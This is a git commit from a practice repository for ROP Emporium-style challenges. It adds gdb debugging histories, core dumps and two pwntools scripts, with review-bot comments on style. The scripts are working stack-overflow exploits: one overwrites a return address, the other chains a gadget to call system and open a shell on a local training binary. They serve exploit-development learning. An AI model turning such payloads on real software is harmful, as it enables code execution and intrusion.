new file: x86_64/ret2win/.gdb_history

new file:   x86_64/ret2win/core
	new file:   x86_64/ret2win/exploit.py
	new file:   x86_64/split/.gdb_history
	new file:   x86_64/split/core
	new file:   x86_64/split/core.split.25050
	new file:   x86_64/split/exploit.py
	new file:   x86_64/split/fuckyou
	new file:   x86_64/split/xaa
This commit is contained in:
Brett Weiland 2020-12-14 18:27:06 -06:00
parent c9f44615e7
commit ae586f332c
9 changed files with 292 additions and 0 deletions


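--- a/x86_64/ret2win/.gdb_history
+++ b/x86_64/ret2win/.gdb_history
@@ -0,0 +1,6 @@
+starti
+context
+nexti
+break main
+continue
+q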

BIN
x86_64/ret2win/core Normal file

Binary file not shown.

13
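--- a/x86_64/ret2win/exploit.py
+++ b/x86_64/ret2win/exploit.py
+#!/usr/bin/env python3
+from pwn import *
+prog = process('./ret2win')
+payload = b''
+for c in range(40):
+payload += b'a'
+payload += p64(0x0000000000400756)
+payload += b"\n"
+prog.sendline(payload)
+sleep(1)
+print(str(prog.recv(), 'UTF-8'))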
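Review bot: The padding loop on the `for c in range(40):` / `payload += b'a'` lines builds a 40-byte filler one byte at a time with an unused index, and the rendered page appears to have lost the body's indentation; `payload = b'a' * 40` says the same thing in one line and sidesteps both. `0x0000000000400756` is a bare magic number, whereas the split script labels each of its addresses with a comment — give this one a name and a comment in the same style. `prog.sendline(payload)` already appends a newline, so the explicit `payload += b"\n"` sends two line endings; one of the two should go. Reading with a fixed `sleep(1)` followed by `str(prog.recv(), 'UTF-8')` is timing-dependent and raises `UnicodeDecodeError` if the program emits any non-UTF-8 byte; `print(prog.recvall(timeout=1).decode('utf-8', errors='replace'))` avoids both. The same loop-and-magic-number pattern recurs in x86_64/split/exploit.py.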

256
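--- a/x86_64/split/.gdb_history
+++ b/x86_64/split/.gdb_history
@@ -0,0 +1,256 @@
+print (char)usefulString
+print (char&)usefulString
+print (char*)usefulString
+print (char)*usefulString
+print (charusefulString
+print (char)usefulString
+print (char*)usefulString
+print (char)*usefulString
+quit
+exit
+quit
+nexti
+exit
+quit
+exit
+quit
+quit
+exit
+quit
+context
+next
+continue
+context
+quit
+nexti
+continu
+context
+q
+context
+run
+break main
+continue
+context
+nexti
+backtrace
+set exception-debugger on
+continue
+quit
+stepi
+ret
+return
+stepi
+break
+delete
+run
+continue
+clear
+delete
+continue
+clear
+delete
+continue
+delete 0x7f992453fece
+delete 0
+delete 1
+delete 2
+delete 3
+quit
+continue
+context
+q
+context
+q
+quit
+continue
+context
+continue
+q
+q
+break main
+continue
+context
+nexti
+stepi
+quit
+break main
+run
+conitnue
+continue
+context
+stepi
+nexti
+stepi
+return
+stepi
+return
+stepi
+ret
+return
+stepi
+return
+stepi
+stepi
+info breakpoints
+stepi
+return
+stepi
+nexti
+break 0x400706
+break *0x400706
+quit
+continue
+context
+q
+continue
+context
+continue
+quit
+continue
+continue
+quit
+continue
+context
+quit
+continue
+quit
+exit
+quit
+nexti
+continue
+quit
+continue
+quit
+break pwnme
+nexti
+continue
+bexti
+nexti
+quit
+quit
+continue
+quit
+continue
+nexti
+quit
+continue
+q
+continue
+quit
+continue
+[
+quit
+start < fuckyou
+continue
+q
+break *0x0x000000000040074b
+break *0x000000000040074b
+run < fuckyou
+context
+x/s 0x7fffffffdb20
+x/s 0x7fffffffdb20 - 20
+x/s 0x7fffffffdb2
+quit
+break *0x000000000040074b
+run < fuckyou
+context
+x/s 0x7fffffffdb20
+x/s 0x7fffffffdb20 - 8
+x/s 0x7fffffffdb20
+x/s 0x7fffffffdb20 - 8
+x/s 0x7fffffffdb20 + 8
+quit
+quit
+run < fuckyou
+quit
+break *0x000000000040074b
+run < fuckyou
+context
+stepi
+q
+break *0x000000000040074b
+run < fuckyou
+context
+q
+break *0x000000000040074b
+run < fuckyou
+context
+x 0x7fffffffdb20-8
+x 0x7ffff7fad800
+q
+break pwnme
+run < fuckyou
+nexti
+q
+break pwnme
+run
+q
+break pwnme
+run < fuckyou
+context
+nexti
+q
+break pwnme
+run < fuckyou
+nexti
+x/100c 0x7ffff7fad800
+context
+nexti
+quit
+break *0x00000000004007c3
+run < fuckyou
+context
+nexti
+stepi
+q
+break pwnme
+start < fuckyou
+context
+stepi
+return
+context
+break pwnme
+continue
+q
+break pwnme
+run < fuckyou
+context
+nexti
+stepi
+q
+continue
+quit
+continue
+[A
+quit
+q
+info break
+nexti
+break main
+continue
+nexti
+return
+nexti
+continue
+continue
+continue
+continue
+continue
+continue
+continue
+continue
+continue
+continue
+continue
+continue
+continue
+continue
+continue
+q
+continue
+nexti
+q
+continue
+nexti
+continue
+quit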

BIN
x86_64/split/core Normal file

Binary file not shown.

Binary file not shown.

17
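--- a/x86_64/split/exploit.py
+++ b/x86_64/split/exploit.py
+#!/usr/bin/env python3
+from pwn import *
+context.binary = "./split"
+prog = process('./split')
+payload = b''
+for c in range(40): #originally 40
+payload += b'a'
+payload += p64(0x00000000004007c3)
+payload += p64(0x0000000000601060) # usefulString
+payload += p64(0x000000000040074b) # usefulFunction + offset
+prog.sendline(payload)
+prog.interactive()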
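Review bot: The `#originally 40` comment on the `for c in range(40):` line no longer tells a reader what the 40 bytes are or why the value might have changed; a comment such as `# 40 bytes of padding before the chain` is clearer, the unused loop variable is conventionally `_`, and the loop collapses to `payload = b'a' * 40` as noted on x86_64/ret2win/exploit.py. The second and third `p64(...)` lines are labelled, but the first, `p64(0x00000000004007c3)`, is the only address in the file with no comment and deserves the same treatment. Separately, the `core`, `core.split.25050` and `.gdb_history` files added by this commit are debugger artifacts: a core dump is a full snapshot of the process's memory and environment from the author's machine, so these belong in `.gitignore` rather than in the repository.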

BIN
x86_64/split/fuckyou Normal file

Binary file not shown.

BIN
x86_64/split/xaa Normal file

Binary file not shown.